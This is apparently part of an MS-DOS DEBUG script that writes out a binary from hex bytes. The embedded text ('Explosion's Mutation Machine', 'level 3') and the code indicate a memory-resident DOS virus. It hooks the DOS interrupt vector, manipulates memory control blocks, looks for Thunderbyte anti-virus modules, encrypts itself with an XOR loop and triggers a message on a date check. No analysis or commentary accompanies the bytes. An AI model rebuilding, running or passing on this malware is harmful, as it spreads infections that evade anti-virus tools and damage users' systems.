3E 9A 10 00 75 E7 E8 38 FE 72 E2 2E E 1180 89 16 FA 0D 5A 52 E8 F2 FB BA 00 00 72 D0 51 56 E 1190 57 06 8B F2 BF 9A 10 0E 07 AB B9 40 00 F3 A4 07 E 11A0 5F 5E 59 EB B8 54 42 4D 45 4D 58 58 58 54 42 43 E 11B0 48 4B 58 58 58 54 42 44 53 4B 58 58 58 54 42 46 E 11C0 49 4C 58 58 58 50 52 1E B4 FF 32 DB CD 13 B4 FE E 11D0 CD 13 B8 02 FA BA 45 59 B3 31 CD 16 0E 1F B4 52 E 11E0 CD 21 26 C4 5F 22 BE 0D 0E B9 04 00 51 83 C6 08 E 11F0 8D 7F 0A B9 04 00 56 F3 A7 5E 59 E0 EF 75 06 26 E 1200 80 0E 16 00 01 26 C4 1F 83 FB FF 75 D9 1F 5A 58 E 1210 C3 43 4F 4D 4D 41 4E 44 00 B8 00 00 B1 04 D3 E8 E 1220 8C CA 03 C2 50 B8 9A 0E 50 CB FC 0E 1F B8 0F 00 E 1230 2B 06 0F 00 49 F6 F1 D1 E0 03 E0 B1 19 A1 F5 0F E 1240 F6 F1 0A E4 75 1D B4 2A CD 21 80 FA 07 75 14 B4 E 1250 09 BA F7 0F CD 21 BA CC 03 EC 24 FD B2 C2 EE B4 E 1260 4C CD 21 E8 5F FF B4 62 CD 21 53 33 C0 8E D8 8E E 1270 1E FE 04 81 3E 81 0E 43 4F 74 3D 93 48 8E D8 03 E 1280 06 03 00 2D 44 01 8C CA 81 C2 04 01 3B C2 72 1B E 1290 8C CA 2E 03 16 1B 00 3B C2 72 10 8C D2 8B F4 46 E 12A0 B1 04 D3 EE 46 03 D6 3B C2 73 24 B4 48 BB FF FF E 12B0 CD 21 81 FB 45 01 73 03 E9 9A 00 B4 48 CD 21 48 E 12C0 8E D8 C7 06 01 00 00 00 03 06 03 00 2D 44 01 8A E 12D0 16 00 00 C6 06 00 00 4D 81 2E 03 00 45 01 A3 12 E 12E0 00 8E D8 88 16 00 00 40 A3 01 00 C7 06 03 00 44 E 12F0 01 1E 07 0E 1F FF 06 F5 0F BE 81 0E BF 08 00 A5 E 1300 A5 A5 A5 8E C0 33 F6 8B FE B9 3A 10 F3 A4 BE 42 E 1310 09 B9 3A 00 F3 A4 33 C0 26 A3 9A 10 8E D8 A1 6C E 1320 04 26 A3 43 00 A1 6E 04 26 A3 40 00 C6 06 FB 04 E 1330 EA C7 06 FC 04 08 0D 8C 06 FE 04 FA A1 84 00 26 E 1340 A3 4A 10 A1 86 00 26 A3 4C 10 C7 06 84 00 FB 04 E 1350 8C 1E 86 00 FB 5B 0E 1F 8E C3 BE 11 00 80 7C 12 E 1360 00 75 0D BF 00 01 89 7C 14 89 5C 16 A4 A5 EB 0C E 1370 8C C8 2B 04 01 44 16 03 44 0E 8E D0 8E DB 33 C0 E 1380 2E FF 2E 25 00 E2 04 0D 0A 57 65 6C 63 6F 6D 65 E 1390 20 74 6F 20 74 68 65 20 45 78 70 6C 6F 73 69 6F E 13A0 6E 27 73 20 4D 75 74 61 74 69 6F 6E 20 4D 61 63 E 13B0 68 69 6E 65 20 21 0D 0A 44 69 73 20 69 73 20 6C E 13C0 65 76 65 6C 20 33 2E 0D 0A 24 B9 3A 10 33 D2 E8 E 13D0 16 00 B4 40 8B 1E 74 10 9C 9A 00 00 00 00 72 02 E 13E0 3B C1 9C E8 02 00 9D C3 51 8B F2 B8 34 12 B9 1D E 13F0 08 31 04 05 34 12 46 31 04 05 34 12 46 E2 F2 59 E 1400 C3 B0 03 CF R CX 1304 W Q